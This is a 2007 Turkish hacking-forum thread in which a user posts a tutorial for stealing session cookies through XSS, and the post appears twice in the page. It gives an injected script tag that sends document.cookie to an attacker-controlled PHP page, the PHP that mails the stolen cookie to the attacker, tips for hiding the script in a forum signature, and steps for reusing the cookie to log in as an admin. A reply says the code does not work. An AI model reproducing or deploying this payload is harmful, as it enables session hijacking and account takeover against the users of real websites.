Cookie Açalarak Web Hack - The-Sabotage Cyber Hackers And Security Platform

COZy · 06-11-2007, 13:42

Bu dökümanda size XSS ile bir hack yöntemi anlatacağım öncelikle işin mantığına değinmek istiyorum. Küçük bir javascript koduyla, kodun bulunduğu mevcut sayfaya ait cookie’yi çalabiliyoruz. Peki bu bizim ne işimize yarayacak? Ekleyeceğimiz bir php mail yollama koduyla elde edilen cookie değeri belirttiğimiz maile yollanabilir. Böylece o cookie değerini bizim o mevcut site uzerinde sahip olduğumuz cookie ile değiştirebiliriz. Yani eğer adminin cookie’yi çalarsak ve o sitedeki kendi cookiemiz ile değiştirirsek. Siteyi açtığımız an admin olarak giriş yapmış oluruz.

Buradaki sorun ise sadece mevcut sayfanın cookie değerini alabilmesi, yani color=#ffcc66www.hedefsite.com uzerinde bu kodu yazabilmemiz lazım. Imzasında veya herhangi bir yerinde html kodu serbest olan forumda aşşağıdaki kodu giriyoruz:

**********window.navigate("http://www.sitem.com/cookieyolla.php?data="+document.cookie)</script>

Not: Bu kodu başka bir şeyin arkasına gizleyebilirsiniz, örneğin imzanızda html sayesinde kayan yazı koyarsınız ama arka planda bu kodda bulunur.

Bu html kodu, kodun mevcut olduğu sayfayı açanların cookie değerlerini cookieyolla.php uzerinden bize yollamaktadır. Cookie yolla.php çok basit bir php kodudur, "data" değerini "cookieyolla.php" üzerinden maille atar "+document.cookie ise cookie yi çalan javascript kodudur. Işin mantığı bu.

Cookieyolla.php kodu:

<?

$cookie = $_GET[’data’];

$kime = "Microsoft@mailserverı.com";

$konu = "cookie";

mail ($kime,$konu,$cookie);

?>

Not: cookieyolla.php’yi kendiniz değiştirebilirsiniz, yaratıcılığınıza bağlı.

Gencay @mailserverı.com yerine cookie değerini yollamasını istediğiniz maili(yani kendi mailinizi yazın)

Cookie elimize geldiği zaman "Bilgisayarım/C/DocumentsandSettings/Kullanıcıadı/Cookies" klasörü içindeki html kodunu soktuğunuz sitenin adının bulunduğu txt dosyasındaki cookie ile değiştirin böylece gelen cookie ile giriş yapmış olursunuz.

Eksi sözlük’ün hacklenmesinde kullanılan yöntem böyle siz bunu geliştirebilirsinizde

setsals · 12-09-2007, 22:34

**********window.navigate("http://www.sitem.com/cookieyolla.php?data="+document.cookie)</script>
yazmışşsın altına email adresime gelecek diye de bir php kodu vermişsin kardeş bu olmuyo

06-11-2007, 13:42	#1 (permalink)
COZy Yüzbaşı Üyelik tarihi: Jun 2007 Mesajlar: 337	Cookie Açalarak Web Hack Bu dökümanda size XSS ile bir hack yöntemi anlatacağım öncelikle işin mantığına değinmek istiyorum. Küçük bir javascript koduyla, kodun bulunduğu mevcut sayfaya ait cookie’yi çalabiliyoruz. Peki bu bizim ne işimize yarayacak? Ekleyeceğimiz bir php mail yollama koduyla elde edilen cookie değeri belirttiğimiz maile yollanabilir. Böylece o cookie değerini bizim o mevcut site uzerinde sahip olduğumuz cookie ile değiştirebiliriz. Yani eğer adminin cookie’yi çalarsak ve o sitedeki kendi cookiemiz ile değiştirirsek. Siteyi açtığımız an admin olarak giriş yapmış oluruz. Buradaki sorun ise sadece mevcut sayfanın cookie değerini alabilmesi, yani color=#ffcc66www.hedefsite.com uzerinde bu kodu yazabilmemiz lazım. Imzasında veya herhangi bir yerinde html kodu serbest olan forumda aşşağıdaki kodu giriyoruz: **********window.navigate("http://www.sitem.com/cookieyolla.php?data="+document.cookie)</script> Not: Bu kodu başka bir şeyin arkasına gizleyebilirsiniz, örneğin imzanızda html sayesinde kayan yazı koyarsınız ama arka planda bu kodda bulunur. Bu html kodu, kodun mevcut olduğu sayfayı açanların cookie değerlerini cookieyolla.php uzerinden bize yollamaktadır. Cookie yolla.php çok basit bir php kodudur, "data" değerini "cookieyolla.php" üzerinden maille atar "+document.cookie ise cookie yi çalan javascript kodudur. Işin mantığı bu. Cookieyolla.php kodu: <? $cookie = $_GET[’data’]; $kime = "Microsoft@mailserverı.com"; $konu = "cookie"; mail ($kime,$konu,$cookie); ?> Not: cookieyolla.php’yi kendiniz değiştirebilirsiniz, yaratıcılığınıza bağlı. Gencay @mailserverı.com yerine cookie değerini yollamasını istediğiniz maili(yani kendi mailinizi yazın) Cookie elimize geldiği zaman "Bilgisayarım/C/DocumentsandSettings/Kullanıcıadı/Cookies" klasörü içindeki html kodunu soktuğunuz sitenin adının bulunduğu txt dosyasındaki cookie ile değiştirin böylece gelen cookie ile giriş yapmış olursunuz. Eksi sözlük’ün hacklenmesinde kullanılan yöntem böyle siz bunu geliştirebilirsinizde

Seçenekler
Yazdırılabilir şekli göster Sayfayı E-Mail olarak gönder
Stil
Normal Hybrid-Şeklinde gösterime geç Ağaç şeklinde gösterime geç

12-09-2007, 22:34	#2 (permalink)
setsals Astteğmen Üyelik tarihi: Jul 2007 Mesajlar: 32	**********window.navigate("http://www.sitem.com/cookieyolla.php?data="+document.cookie)</script> yazmışşsın altına email adresime gelecek diye de bir php kodu vermişsin kardeş bu olmuyo

Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)